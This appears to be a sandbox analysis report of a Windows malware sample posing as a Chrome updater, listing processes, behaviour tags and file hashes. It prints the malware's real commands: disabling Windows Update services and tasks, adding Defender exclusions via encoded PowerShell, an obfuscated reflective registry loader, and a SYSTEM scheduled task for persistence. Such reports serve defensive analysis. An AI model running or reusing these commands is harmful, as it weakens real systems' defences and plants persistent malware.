856 268 cmd.exe powercfg.exe PID 268 wrote to memory of 856 268 cmd.exe powercfg.exe PID 268 wrote to memory of 856 268 cmd.exe powercfg.exe PID 764 wrote to memory of 452 764 cmd.exe takeown.exe PID 764 wrote to memory of 452 764 cmd.exe takeown.exe PID 764 wrote to memory of 452 764 cmd.exe takeown.exe PID 764 wrote to memory of 824 764 cmd.exe icacls.exe PID 764 wrote to memory of 824 764 cmd.exe icacls.exe PID 764 wrote to memory of 824 764 cmd.exe icacls.exe PID 764 wrote to memory of 1280 764 cmd.exe reg.exe PID 764 wrote to memory of 1280 764 cmd.exe reg.exe PID 764 wrote to memory of 1280 764 cmd.exe reg.exe PID 764 wrote to memory of 984 764 cmd.exe reg.exe PID 764 wrote to memory of 984 764 cmd.exe reg.exe PID 764 wrote to memory of 984 764 cmd.exe reg.exe PID 764 wrote to memory of 1660 764 cmd.exe reg.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:476
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:460
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1828
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1960
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
- Modifies data under HKEY_USERS
PID:292 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:872 -
C:\Windows\system32\taskeng.exetaskeng.exe {9E461821-0614-41BD-842F-E4E0C24B0DE1} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
PID:324 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAB2AHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdAB5AGsAIwA+AA=="5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵PID:168380
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:168400 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:168564 -
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:1920 -
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
PID:168748 -
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
PID:168836 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
PID:168348 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
PID:168588 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies registry key
PID:168676 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
PID:1768 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
PID:168476 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:168832 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:168888 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
PID:168496 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
PID:1924 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
PID:168632 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
PID:168900 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE6⤵PID:168604
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE6⤵PID:1716
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE6⤵PID:168784
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE6⤵PID:168356
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE6⤵PID:1348
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE6⤵PID:1036
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵PID:1824
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵PID:168444
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:168544 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:168576 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
PID:168428 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵PID:168472
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "ahqffhzbijamz"5⤵PID:168336
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:836
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Drops file in System32 directory
PID:748 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵PID:168696
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:416
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{8fc2c8c3-5926-4f7d-8b5c-db0e54dfc18d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588 -
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{94ad35fc-6dcb-4f1a-b99b-613ee779ce6b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:168460
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:484
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵PID:848
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1268
-
C:\Users\Admin\AppData\Local\Temp\Setup2.exe"C:\Users\Admin\AppData\Local\Temp\Setup2.exe"2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAB2AHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdAB5AGsAIwA+AA=="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:336 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:532 -
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:1924 -
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:112 -
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:1556 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:1816 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:1912 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
PID:1388 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:1260 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:584 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:452 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:824 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1280 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:984 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1660 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1488 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:1764
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:304
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:1676
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:552
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:1804
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:1600
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:2040
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgByACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAdABlAG0AcAAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHQAZQBtAHAALgBlAHgAZQAnACkAIAA8ACMAcQB3AHUAIwA+AA=="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\temp.exe"C:\Users\Admin\AppData\Local\Temp\temp.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\cmd.exe"C:\Users\Admin\AppData\Local\Temp\cmd.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1280 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:168328 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 1666086⤵
- Loads dropped DLL
- Program crash
PID:168408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "temp.exe"5⤵PID:164652
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 56⤵PID:168372
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
PID:972 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵PID:520
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""4⤵
- Creates scheduled task(s)
PID:452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵PID:1440
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵PID:1488
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1232
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "485958907-766256497-424201914-1389973767105906324412017678218444066971556702938"1⤵PID:1524
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1594856442-1593862860-507866125765907161677168209115057963019532011982113678461"1⤵PID:168468
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.5MB
MD57ede5e1864c423c59a1cb3bdcd7cc939
SHA1f34f722ed04615441656ccef087e7b982ae09af9
SHA2564754c64162263a12327a42ebcd023e7d0aaae400d02915c1c0ea972ce994842d
SHA51247350800da01d48c6c5ae1a7132bb3f9ed1a247fefbd153b4ec890fd1946a5812ae901f18b775dcc30deeb61e712f42436fcee1ba642ed1b8086517b81c9c95b
-
Filesize
4.5MB
MD57ede5e1864c423c59a1cb3bdcd7cc939
SHA1f34f722ed04615441656ccef087e7b982ae09af9
SHA2564754c64162263a12327a42ebcd023e7d0aaae400d02915c1c0ea972ce994842d
SHA51247350800da01d48c6c5ae1a7132bb3f9ed1a247fefbd153b4ec890fd1946a5812ae901f18b775dcc30deeb61e712f42436fcee1ba642ed1b8086517b81c9c95b
-
Filesize
351KB
MD52c4214d0aa9bfd57e2669e99f8b72af6
SHA1d84c9cedff9ad408436a7765c5af5cabe1d0a5c9
SHA256c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1
SHA5121baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d
-
Filesize
7KB
MD5f321da5881a6aaeb53da13d5c075406b
SHA1979ed66205d2bad63fc016dc8c32cff6a2b6fc05
SHA256a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c
SHA512c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b
-
Filesize
7KB
MD5f321da5881a6aaeb53da13d5c075406b
SHA1979ed66205d2bad63fc016dc8c32cff6a2b6fc05
SHA256a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c
SHA512c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD532e70c885b8d42529b982b2639a5d245
SHA11c6e3aa8e420a70ec571263e2a668626b893f027
SHA256d1382f8db5a5977f27e14f4e08c4834d8ca9afdf07a41b0011115d34ae2a4ee0
SHA512c946d4c14dff192c097cafbb2958d177cd50ab6665a49bbc4e04d51ac5f01909fc86f7160039e15f5e14dd6befdae16979d1f8a2aad23db3bc9c327cd8a3bd02
-
Filesize
1KB
MD52b664659762e1504232106456dceea97
SHA1fcbea16244580789be1e87fb4107c3843fb9f6d5
SHA2569a1dcaad91c8c63680d8c83bc1705ac714d92e6ee88291cf0e17bcf64b5f4963
SHA512dbe9f90eff738bb5ad3603c2511ca309fbdfabe89411f26b58159b1712ce71faa11c0d6f8d9fab244cd4155c0b3cf6980e862534c06b090dc89cd0dcd3f89983
-
Filesize
1KB
MD528b515facf298156db6981477016a3da
SHA144218c256747affd994b8d0d729a7e85a3d85fe6
SHA2561a84291daf0b67adf0d08dafa8c93f03a49f00130264804d27e51fc73f3b5b12
SHA512c405fda092ae9ad869d4ec6b4cb57dc1cfc4b006a11d349519084dbd4f4bc3b0f33978ca2f8fec9f8aa97ac6892567f24526e927c284dc58d32b484ae803ad7d
-
Filesize
4.5MB
MD57ede5e1864c423c59a1cb3bdcd7cc939
SHA1f34f722ed04615441656ccef087e7b982ae09af9
SHA2564754c64162263a12327a42ebcd023e7d0aaae400d02915c1c0ea972ce994842d
SHA51247350800da01d48c6c5ae1a7132bb3f9ed1a247fefbd153b4ec890fd1946a5812ae901f18b775dcc30deeb61e712f42436fcee1ba642ed1b8086517b81c9c95b
-
Filesize
351KB
MD52c4214d0aa9bfd57e2669e99f8b72af6
SHA1d84c9cedff9ad408436a7765c5af5cabe1d0a5c9
SHA256c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1
SHA5121baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d
-
Filesize
351KB
MD52c4214d0aa9bfd57e2669e99f8b72af6
SHA1d84c9cedff9ad408436a7765c5af5cabe1d0a5c9
SHA256c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1
SHA5121baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d
-
Filesize
351KB
MD52c4214d0aa9bfd57e2669e99f8b72af6
SHA1d84c9cedff9ad408436a7765c5af5cabe1d0a5c9
SHA256c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1
SHA5121baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d